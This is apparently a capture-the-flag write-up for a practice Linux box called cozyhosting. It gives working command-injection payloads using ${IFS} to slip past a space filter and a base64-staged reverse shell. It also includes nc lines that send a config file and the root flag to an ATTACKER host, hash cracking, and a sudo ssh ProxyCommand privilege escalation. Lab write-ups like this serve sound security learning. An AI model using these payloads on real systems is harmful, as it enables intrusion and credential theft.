cozyhosting

Summary

Easy Linux box. Spring Boot Actuator /actuator/sessions leaks an active session cookie → admin panel → SSH-execution form has command injection (whitespace filter bypassed with ${IFS}) → shell as app. Extract DB credentials from the JAR; bcrypt for admin cracks to a single rockyou word, reused by josh. Privesc: sudo /usr/bin/ssh * → ProxyCommand → root.

Flags

Captured locally (omitted per writeup policy).

Recon

22/tcp  OpenSSH 8.9p1 Ubuntu
80/tcp  nginx 1.18.0  cozyhosting.htb (Spring Boot)

Foothold — Actuator + cmd injection

# Leak session cookies
curl http://cozyhosting.htb/actuator/sessions
# {"A586...":"kanderson"}

# kanderson session has admin panel access (HTTP 200)
# Admin panel: POST /executessh with host= and username= fields
# Filter rejects spaces; ${IFS} bypasses it
# ${IFS} must be literal in the injected payload — use single quotes locally

# Write reverse shell via base64 (no spaces in b64 string)
# username=;echo${IFS}B64PAYLOAD|base64${IFS}-d>/tmp/r.sh;#  (single-quoted locally)
# username=;bash${IFS}/tmp/r.sh;#

# → shell as app (uid=1001)

Credential Extraction

# Extract DB config from JAR
;unzip${IFS}-p${IFS}/app/cloudhosting-0.0.1.jar${IFS}BOOT-INF/classes/application.properties|nc${IFS}ATTACKER${IFS}PORT;#

# spring.datasource.password=<pg-pw>  (& in password needs careful quoting)
# spring.datasource.username=postgres
# DB: cozyhosting on localhost:5432

# Query users table (deploy script via base64 due to & in password)
export PGPASSWORD='<pg-pw>'
psql -h 127.0.0.1 -U postgres -d cozyhosting -c "select * from users;"
# admin : $2a$10$<bcrypt-hash>

hashcat -m 3200 hash.txt rockyou.txt
# <cracked-pw>

ssh [email protected]  # password reuse
# user.txt ✓

Privesc — sudo ssh ProxyCommand

sudo -l
# (root) /usr/bin/ssh *

# sudo requires use_pty → use -tt with sudo -S
echo '<cracked-pw>' | sudo -S /usr/bin/ssh \
  -o ProxyCommand='cat /root/root.txt | nc ATTACKER PORT' x
# root.txt ✓

Key Techniques

Spring Actuator /actuator/sessions: ships permissive by default; reveals live session tokens.
${IFS} whitespace bypass: bash IFS expansion defeats space-denylist filters. Critical: keep ${IFS} literal in the locally-sent payload (single-quote the shell variable or escape with \$), otherwise the local shell expands it to a real space before sending.
Script exfil pattern: for commands containing shell metacharacters (&, ", etc.), base64-encode a script, decode it to /tmp, execute separately.
sudo ssh → GTFOBins: ProxyCommand runs through user’s shell. use_pty in sudoers requires a PTY — satisfy with -tt and sudo -S.